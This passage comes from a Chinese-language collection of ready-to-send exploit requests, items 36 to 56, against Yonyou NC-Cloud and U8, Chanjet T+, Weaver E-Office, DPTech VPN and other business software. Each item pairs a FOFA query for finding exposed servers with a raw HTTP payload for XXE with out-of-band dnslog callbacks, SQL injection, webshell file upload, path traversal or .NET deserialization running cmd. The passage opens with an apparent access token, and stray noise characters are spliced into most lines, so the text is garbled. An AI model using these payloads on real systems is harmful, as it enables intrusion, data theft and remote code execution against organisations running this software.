accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
+ T4 w5 `( x+ B4 XContent-Length: 190: ?" m9 D, P) Z# t, c u
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
; \8 |. a; H9 T" O5 b% I t E
, R c$ d: q7 _+ J" ~--fd28cb44e829ed1c197ec3bc71748df0
8 o/ W3 m4 j+ S' V0 p ~$ _Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp": g* R8 _) f+ Q, ?; n, u# q' i7 R
- d1 q& |; `) R. w4 ]5 q$ F: `<%out.println(1111*1111);%>; c' [* x, d8 x1 N/ S( t* v
--fd28cb44e829ed1c197ec3bc71748df0--: i* i0 Y' c, @. p
7 Y. K" V$ x8 H. N! ~7 r
) _& y( i9 W; T0 e6 k/ p36. 用友NC-Cloud soapFormat XXE
* R8 T& O; b, x( \FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
! o* V! X' d1 X$ e9 @$ zPOST /uapws/soapFormat.ajax HTTP/1.1
% X* p# P5 { ^5 uHost: 192.168.40.130:89897 L" y/ d! e7 w" h' o" M% u# W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0& @/ W4 A+ k" X0 C |5 z
Content-Length: 263
, A/ X/ o2 u m; s$ h) S& o' Q nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 t0 q) Z0 i, M( n7 ?Accept-Encoding: gzip, deflate
- T7 y7 p. V- Y! h" GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 C' I& g+ g$ kConnection: close, _$ H4 y' c" ]- Z* P. y
Content-Type: application/x-www-form-urlencoded1 `2 M- P* X& W# \2 r
Upgrade-Insecure-Requests: 18 [9 w. w4 m G, ~; J
' ?9 j8 n7 W% l& Q" I5 h9 S6 l# w
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a6 i! s! H, P+ e; t @
4 D3 p$ s8 _5 p+ O5 ~5 a/ O- X% q" ^1 ` e" I# |/ l$ X
37. 用友NC-Cloud IUpdateService XXE
) ], O6 Q- T: h; ?' LFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
% R. f4 U0 @. [+ y3 ]2 uPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1, S. {* U) k; |1 l1 B; D, h9 M
Host: 192.168.40.130:8989. {5 _! M9 {" P6 S0 K" o Q4 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36+ w( `2 ~+ @/ ]3 v1 z
Content-Length: 421
) d( x% |2 v! m6 b1 |, @- NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
' ^( R8 r5 [) J* c; MAccept-Encoding: gzip, deflate
! n, }" Y4 k# s$ [( b% ?Accept-Language: zh-CN,zh;q=0.9
/ q9 L. P4 J& h( OConnection: close
5 n4 L# v1 i1 w, A* O& gContent-Type: text/xml;charset=UTF-8
% f5 J9 z7 w3 C& V* hSOAPAction: urn:getResult) G) E& P: L. m7 P+ X1 h8 _: F
Upgrade-Insecure-Requests: 17 O9 Q7 \0 K6 \4 q9 R2 y4 t
. d0 F% j2 ?1 G) e" B( A% j<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
, \, v; N- `. S q<soapenv:Header/>
2 x2 S6 e- d0 `4 [7 H+ G# L<soapenv:Body>: J5 B6 ?* K( ~# |3 L
<iup:getResult>8 i- f9 p% n- d. S
<!--type: string--> z* n; P: Z5 ^+ ]
<iup:string><![CDATA[; ?! H% `* i" B& w- _3 {
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
4 C1 p0 G& y3 w. L, Q3 y- r$ ]) n/ ^<xxx/>]]></iup:string>
1 K6 }' m& I7 H9 J/ F7 Z6 L0 @; ]0 a</iup:getResult>- s7 C8 G; b+ j* ^! |6 D
</soapenv:Body>
6 e" S8 `; |% Q/ Z</soapenv:Envelope>
" E& ^5 \; o7 m/ J! {& u8 L/ [1 h. y
7 T7 X2 q' [0 n/ ?, Q
# `- Q5 O) q0 b0 n
38. 用友U8 Cloud smartweb2.RPC.d XXE- s( G, C v7 L, b' b! _9 o
FOFA:app="用友-U8-Cloud"% Q1 w* G( {" x: |% T7 k. Y
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.12 z' M' Z- u7 B# J9 ?! J
Host: 192.168.40.131:8088( H/ V6 C: @; @7 W% W, @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25: N, {( K3 o5 U% u
Content-Length: 260) |8 m! M E8 E: [! M! r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
0 {2 V) ~+ O* O C* B7 c* R8 MAccept-Encoding: gzip, deflate
' W5 P8 m) x* t- N# q4 lAccept-Language: zh-CN,zh;q=0.9! d) h4 r8 h% G* ^: J& B! u+ M
Connection: close
7 C' F2 ~2 D) H8 [! ]' O. hContent-Type: application/x-www-form-urlencoded8 c# m/ n5 o. e. u
7 D2 F2 i- P/ n
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>6 u- S0 B& x( ]
# y( K$ V- c( G2 C
! `: ?9 y. a1 ~" P2 I/ |% x39. 用友U8 Cloud RegisterServlet SQL注入( {4 Q0 K F, I( X
FOFA:title="u8c"7 A% |1 u$ E, B7 r8 t, ^
POST /servlet/RegisterServlet HTTP/1.1
. H3 T* F& ^) B0 D4 V2 G6 W$ cHost: 192.168.86.128:8089 p) u5 Y8 n: L: B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
- d; v9 S [0 W6 D, AConnection: close& e9 T* C2 _) l. w# e
Content-Length: 85
# n H: J* h: r3 ?2 A. o( n" t1 QAccept: */*5 _7 X! L# m6 H) I
Accept-Language: en
; b& y! ^9 e8 x2 D1 QContent-Type: application/x-www-form-urlencoded
! |* A7 j9 K' R- s tX-Forwarded-For: 127.0.0.1/ l5 j0 T- e5 g, D0 A6 ]
Accept-Encoding: gzip% z# p! X; X- `5 L. M
7 }" i+ Z, o# ~4 l. |& V# B7 susercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
! p; l$ [4 g# [1 c9 m
* q: w: M, S1 h% y/ A9 {$ \5 d' V% ?2 G. N8 Y$ A* U
40. 用友U8-Cloud XChangeServlet XXE
& _" C+ {1 {. n. I2 zFOFA:app="用友-U8-Cloud"
4 L9 R3 z, A( m% y8 |! G/ UPOST /service/XChangeServlet HTTP/1.1* k7 n7 n2 ]8 z* K* ]
Host: x.x.x.x3 J" m2 m; ~0 k$ R: N
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36; p% B# j# e+ _* E
Content-Type: text/xml) W: U: J- C B/ L3 r
Connection: close
# {1 w- x) Q% o3 j
9 f* A0 F1 X( h8 i2 s: h<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
! I& {. X' j+ X) F9 |( v$ L w0 W; k2 h; w6 s/ f( N
& v% h% v# j- e2 X/ J41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
) ^& [ D7 ` B1 sFOFA:app="用友-U8-Cloud"
. U0 v z: E1 O; N% l4 pGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1) B7 h- @0 k# Q0 Z9 R5 o4 @+ U/ O% c6 {
Host:% ] ]3 x6 \7 q) J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& v4 o2 w) t* b G. a$ q* c7 p
Content-Type: application/json
% h" p3 R% O0 CAccept-Encoding: gzip
1 S9 {* D7 H5 N0 C5 e9 @Connection: close( H: ]0 A& D8 b0 A' R
+ \- k( w' m3 N4 ^
( ~0 F' [1 o+ e0 ^8 g3 \
42. 用友GRP-U8 SmartUpload01 文件上传
7 l c* {" K9 e1 B0 V% |% o/ i6 |! QFOFA:app="用友-GRP-U8"
3 J. r+ p9 j1 c3 nPOST /u8qx/SmartUpload01.jsp HTTP/1.17 f# Q, r+ `6 f/ C
Host: x.x.x.x; T" m% k" {) v
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt; P; [9 ]0 a1 R& k3 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36; N# T5 d4 i) x6 S* w
- u- d6 C* G7 m4 U% I
PAYLOAD: s" L3 r/ A* L
+ e, h' t) n0 q0 M" T; Z! O- w0 h8 g" D5 d
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml& \: W; [# \0 U
: P& T9 c1 C" U! B \
43. 用友GRP-U8 userInfoWeb SQL注入致RCE- E* {6 K& x$ C
FOFA:app="用友-GRP-U8"
; e- C+ {+ f3 S" m- ]# qPOST /services/userInfoWeb HTTP/1.16 U, t8 [) C* N5 x
Host: your-ip
0 _! z# ?( r0 ?6 e" q$ S" wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ k" R8 P# l3 ~/ AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 N. g3 Y7 x l( B- H: G% J" NAccept-Encoding: gzip, deflate4 A/ Y: v) z9 t
Accept-Language: zh-CN,zh;q=0.9& A }, Z; h7 M1 r6 i$ J k2 J8 {( S% G
Connection: close
$ T7 W9 [! o; f' HSOAPAction:7 H/ r. O. E/ b8 }
Content-Type: text/xml;charset=UTF-8" p0 j3 m( u0 N7 p, A
- Q% f( z" @3 [8 p6 Q/ R" ~7 R
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">- {/ v1 p" k( L Y/ U) w
<soapenv:Header/>( c8 {# p7 x, D2 f: \
<soapenv:Body>
2 J; \; q1 u+ _/ r( z e <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
5 {, `+ \- V0 S0 X6 Q <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
& ^, @3 q/ Z$ S* ?; ^; M, B _9 P </ser:getUserNameById>& s" U `$ c5 c: y: e9 i
</soapenv:Body>
5 Z8 e) k7 t( H% N0 }! W</soapenv:Envelope>& k' F1 m- X# ]8 |' Q
3 {; C0 A, q9 W
/ ?, ~6 `. [1 T, M* B: E3 U2 {
44. 用友GRP-U8 bx_dj_check.jsp SQL注入- {4 }( Q' O) T6 M/ u1 A
FOFA:app="用友-GRP-U8"8 P: ^8 u2 J7 f( t% J E* F
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
" x, c% m. p$ x. rHost: your-ip. S2 O+ `% O+ U7 v% a+ Y: v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.362 T; S+ N# m0 k- B2 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" K3 l# x+ Y9 B4 y+ dAccept-Encoding: gzip, deflate
0 |/ Q6 t3 R! b& X5 s3 v2 wAccept-Language: zh-CN,zh;q=0.92 c; L& R3 \2 o0 K: P4 g7 f: n
Connection: close
2 C7 m2 U0 H* N7 _9 r: z) y( H- m5 Z- l& Y- O6 v
8 v6 a$ A: Y2 L% a) {7 C0 b
45. 用友GRP-U8 ufgovbank XXE6 F( F. y0 ^3 F/ r
FOFA:app="用友-GRP-U8"" b+ ]' S0 {$ K& B
POST /ufgovbank HTTP/1.1* K+ N* i$ s6 \2 W% U" s* w, u
Host: 192.168.40.130:222+ b0 K/ l$ j- B6 O$ f8 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0, M) w# t$ w2 t i w
Connection: close! J, V$ F/ n/ h3 w- ?
Content-Length: 161' b+ z+ X+ D9 r6 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 n z" A9 Q. F$ X& X9 sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* W5 \' J+ u: D/ n0 A5 cContent-Type: application/x-www-form-urlencoded
# O9 s1 H$ x) H8 I5 t7 b! rAccept-Encoding: gzip+ G$ ]& f9 b9 @, S- y+ [0 Z4 l4 f) V
( {* ^, e, v6 N+ c& V' n( a+ S
reqData=<?xml version="1.0"?>- F7 N" u( \8 N8 A8 p" H
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest- C2 q; N) k( s, u! a! ?
/ Y# o; ~# d2 k0 J0 p9 h$ B
W% h# p& G, M) A0 h a+ p9 `46. 用友GRP-U8 sqcxIndex.jsp SQL注入
' S1 L! {1 l- u! ^) s& vFOFA:app="用友-GRP-U8"/ z$ V5 f7 f/ Y0 N8 {3 _
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1. F( w* ?- G; a0 B! ^( u6 c1 b
Host: your-ip
0 b! z, X' {9 U7 b- hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
3 |- U* e# W h' s7 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( {" W& w+ d0 k! V/ EAccept-Encoding: gzip, deflate
# A4 a. ]; t4 i8 v- w$ GAccept-Language: zh-CN,zh;q=0.9/ Q& m: c5 [! ~& o7 U8 `/ }% N
Connection: close0 r6 H! Z$ P4 C4 [5 H1 Q: y
: r$ h" `: q) S# B* F# s4 [
" m3 [1 v' z: c2 Q4 [7 ^47. 用友GRP A++Cloud 政府财务云 任意文件读取0 I4 j5 F% v& ]' L
FOFA:body="/pf/portal/login/css/fonts/style.css"
y) C2 V' ~1 v4 ? g* ]6 GGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
. p5 t3 P+ h3 T X, v- D( F, cHost: x.x.x.x+ k! c: [/ R. m
Cache-Control: max-age=01 b9 a/ l* I+ o
Upgrade-Insecure-Requests: 1' f8 h% d$ T& W2 Z. E. ]( M! t: Q: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
. ]$ g) ]% B7 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" V: a6 L- D/ O/ f# ]$ ~
Accept-Encoding: gzip, deflate, br
9 b+ q1 y2 d2 q4 m7 YAccept-Language: zh-CN,zh;q=0.9
8 J# z, S% q, B+ U! {If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
0 U" K0 o9 P7 d+ \ Q0 L8 P9 |Connection: close
. m1 M( a- D4 u+ V& B2 Y- K
! p; O6 o/ j0 [( j0 l9 b( ?
' d, k1 c! Y& q7 }2 s3 N- l
+ u$ k9 t- B- y3 U48. 用友U8 CRM swfupload 任意文件上传& `9 `; c8 t# V7 @
FOFA:title="用友U8CRM"# m" |. g& U& ?1 d( |3 N( Q; l
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
2 }7 @' B7 Y8 O0 r f* `& l9 QHost: your-ip
# J) f$ i4 \0 O( a+ d8 K$ }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
2 j9 {1 ? d& {) Y( FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: q* D( d- y% s/ C" i9 I2 y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, D% T; q. ~4 Q: @: p
Accept-Encoding: gzip, deflate
7 O- [4 R2 l& w- R8 ?; hContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
# I, ~" \" l' `+ P! W; R. A6 |------269520967239406871642430066855
. @$ X; A0 T# b8 k/ y2 V0 G# L6 ?: [Content-Disposition: form-data; name="file"; filename="s.php"2 i6 d5 D9 N' F% Q
1231
" f7 a: r! s# t R1 W$ G- d- q% AContent-Type: application/octet-stream f/ e, F/ Y- l! Y) l5 E' j
------269520967239406871642430066855
/ t0 U; w8 i- t& F4 nContent-Disposition: form-data; name="upload"
8 c' L0 L$ E# T. c# p- Wupload
+ O& E, G9 y' m( W7 P/ P: p, a- y------269520967239406871642430066855--
+ X8 ]: G9 X! R
& w0 }) O! g& y9 f5 D7 [8 P1 E2 g9 E2 c- N; o4 y
49. 用友U8 CRM系统uploadfile.php接口任意文件上传, A# d* k$ T3 `3 Z6 H: G' V
FOFA:body="用友U8CRM") O6 W' h+ z7 ^# Z. l
: R. N; I' a9 l* u4 C8 K
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1( A! W6 n* @9 O+ ]
Host: x.x.x.x
3 Q2 W' M w8 \9 V- k) f9 A5 D3 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0% L9 A' u5 j6 \/ J' E. S* a
Content-Length: 329* d0 P: i/ I6 h! ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
_/ g6 [& B7 q; L* T" j. mAccept-Encoding: gzip, deflate0 p0 w. T% j. u$ \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( Y5 l6 W) ?; J% E$ L' iConnection: close! m7 C Q9 P+ @; I
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
" I1 [) n. L4 w& J: e( b1 G7 e) Q, l5 V5 b! P) V: S/ d! H
-----------------------------vvv3wdayqv3yppdxvn3w
0 Z3 n0 t Z& w5 ?Content-Disposition: form-data; name="file"; filename="%s.php "
6 W) E: o _& Q& ?$ v/ P) zContent-Type: application/octet-stream" f1 o4 c9 r* U$ u8 Y; l* b5 J9 _8 \$ t+ B
; a. c( y5 c4 K* e7 @; n
wersqqmlumloqa( T) _* q5 ]1 ` j( @; m, B! g" r0 z
-----------------------------vvv3wdayqv3yppdxvn3w3 R% ]; c/ v; R; w7 G
Content-Disposition: form-data; name="upload"
b0 n+ Y- p/ F& k! F. ^9 X2 H& p" m
7 d$ W1 T1 ?! H# e4 Vupload
O! U3 J+ Y- H, ] J! x& U8 H-----------------------------vvv3wdayqv3yppdxvn3w--: k. _/ B/ X7 l0 f
' {: S" ^$ ` u- _9 }% x& q
0 e" O6 j7 a9 v5 A; h- [http://x.x.x.x/tmpfile/updB3CB.tmp.php
; t) m! ~6 i# W1 k" B; m8 z B# x s+ k; i% J& w' d
50. QDocs Smart School 6.4.1 filterRecords SQL注入
# n; x/ b9 j) o) X3 UFOFA:body="close closebtnmodal"
1 Q9 K+ }# [6 f4 m2 s) ^POST /course/filterRecords/ HTTP/1.1, w. J9 `6 g% K" s
Host: x.x.x.x
- y; I$ N/ v8 F( ?( k& J" GUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. `% A. @- A) O* t# ~4 k
Connection: close( q a1 \4 K' o9 ~- k5 d) G
Content-Length: 224
, m- i1 U+ U: j" u& xAccept: */*/ X" W2 _( l7 G. h
Accept-Language: en
' p% @* J* X& {Content-Type: application/x-www-form-urlencoded
8 f& I- j8 C; Y' ?* |5 v& O7 N/ rAccept-Encoding: gzip5 k+ m3 {; l" l0 M$ @
( N3 ~" W2 c) F7 ?) ~' J" W
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1( w0 K, U4 T/ }) \, J8 a
/ C: o% j- K" Q$ I
+ t7 L, x$ v9 N
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入* s* U" V% j5 x _- S+ t5 N. ^
FOFA:app="云时空社会化商业ERP系统"
- o. {) l# b! W- p/ l) o( tGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
: ?/ B+ K( a" f4 y* AHost: your-ip
+ Z6 Y9 e% L' Q f' C, J: a x1 A8 q% {+ UUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
7 I: H3 l! h' T6 v& BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' W L _' U" C% E$ ]6 q
Accept-Encoding: gzip, deflate
! E; t$ O) `) q+ H% P! pAccept-Language: zh-CN,zh;q=0.9( I$ Z1 {* @, K9 k2 R7 o
Connection: close
c- Y1 u: i$ V8 P# q$ P2 o0 z" g- ]/ F; g- Q. `
: c# s% J' {& I; @3 H
52. 泛微E-Office json_common.php sql注入
- B+ K( P! _" v! ?: bFOFA:app="泛微-EOffice"
) D8 w2 g- f3 h% |POST /building/json_common.php HTTP/1.10 ~2 U, d. D4 O/ }% q2 K/ h
Host: 192.168.86.128:80979 g& X9 z* q ^% M$ b
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 S0 C. [* R/ e8 ^1 Y4 l Y9 }4 Z
Connection: close
2 ^" L1 F' E2 bContent-Length: 87
$ e1 u3 h0 V! ?$ M O0 ?' e [0 l0 wAccept: */*
' Y/ F$ z* x, v) JAccept-Language: en. H8 d- K3 f5 A" O9 q* ]
Content-Type: application/x-www-form-urlencoded
) C& ^$ `: T, J+ K5 y+ AAccept-Encoding: gzip1 ]1 u7 o0 l& H Z0 }( U
0 p1 J$ D7 F/ Y- q7 Htfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
; T9 Q) D9 D7 b! X* U! r0 N
3 B; c: ?4 S4 T
0 R% F1 {) R& S- C; ^8 S, d F+ r53. 迪普 DPTech VPN Service 任意文件上传
% H+ f1 }& b, i& b& rFOFA:app="DPtech-SSLVPN"
4 `6 w5 s5 E; G+ F/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
8 C3 q# Y/ g# o# a$ t
2 C# e' h, i! R( {# {: r0 c. N" Z
/ d2 {* [% F+ c" _9 `54. 畅捷通T+ getstorewarehousebystore 远程代码执行
& O4 L g& I; xFOFA:app="畅捷通-TPlus"/ M' L6 ^5 ? `' |; F- x& k
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件" g( H2 \, R/ u( X( Q
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt". m4 D a: f8 j% {; w
! W9 k7 Z1 X7 C. x+ A. B
2 ]8 q2 H" V+ z; N" f
完整数据包
& e# d; }7 \5 T* M/ iPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.12 ?& N/ \& K4 l! ^
Host: x.x.x.x
) m! b7 B2 q/ v! Z- XUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F3 f1 N: i- i& n% H8 T3 c; T @, i
Content-Length: 593
! j7 f+ M) v' Q4 `. p( b& I! I; R% P6 ] S1 z2 ~: K. S1 M) _
{9 @) q9 l0 n3 N( q1 J5 M
"storeID":{, i' v( m/ z6 c* P5 J
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",9 b% y: @' t! T, W: T
"MethodName":"Start",+ _! G4 q6 l, k9 B- ^! }- o. i$ t9 g
"ObjectInstance":{1 |! W) L' ?! o0 S6 X' z3 ]5 h7 n
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",- F& M7 n2 Q4 P# [
"StartInfo":{% s0 C6 F, S+ ?* b
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",# i5 N, F- q! I# W! g
"FileName":"cmd",
6 A: f) {) l% A8 Q$ u( G/ o "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"0 V6 ^2 [8 r% o/ T
}& h$ f% q0 {$ T6 R& A8 P
}
5 i" N* M X6 V& I. ^* |4 R4 q }# W( O9 M2 p9 l k+ x4 u8 y
}
( f; |7 D' r7 `0 b8 P- r, y' R2 C/ L
s6 n" }6 N" S4 f. n; B
. l% K h# Q' U [3 f; U! a第二步,访问如下url
2 \! I0 A/ v: U& L& N7 g+ w/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
0 j6 A0 l: a" {# N2 @ b& u8 e% I D7 W8 s3 k+ C6 I- ^
% J! q( O( l9 L, A: }( F( F55. 畅捷通T+ getdecallusers信息泄露; f* P4 _4 r+ M, I+ S) h/ S
FOFA:app="畅捷通-TPlus"5 C% e" K# u- Y- t3 w$ \. z
第一步,通过* d8 U( O+ e# g" a2 q6 h' {
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie5 g: D/ z( [ n% I
第二步,利用获取到的Cookie请求
7 w1 d+ w4 F$ {* r1 H/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
( J0 l) N6 f( y+ I
/ ?! G4 t/ C$ Z1 R+ R56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE8 q2 S% i* o1 e5 i5 _( f4 S: I6 Y
FOFA: app="畅捷通-TPlus"$ ]$ Y: Y: u* q# B5 R7 k
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1! y% }' e2 r; M- L
Host: x.x.x.x: X0 Q. z3 I4 s( s: _5 u: \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
1 P C! n8 I- U3 {% Z" \# I) R9 nContent-Type: application/json6 L& Z" E; T2 u- B
0 |( J( M) L* B5 m0 Z; o& m- O
{% D+ r/ y+ S! s/ m8 ^
"storeID":{
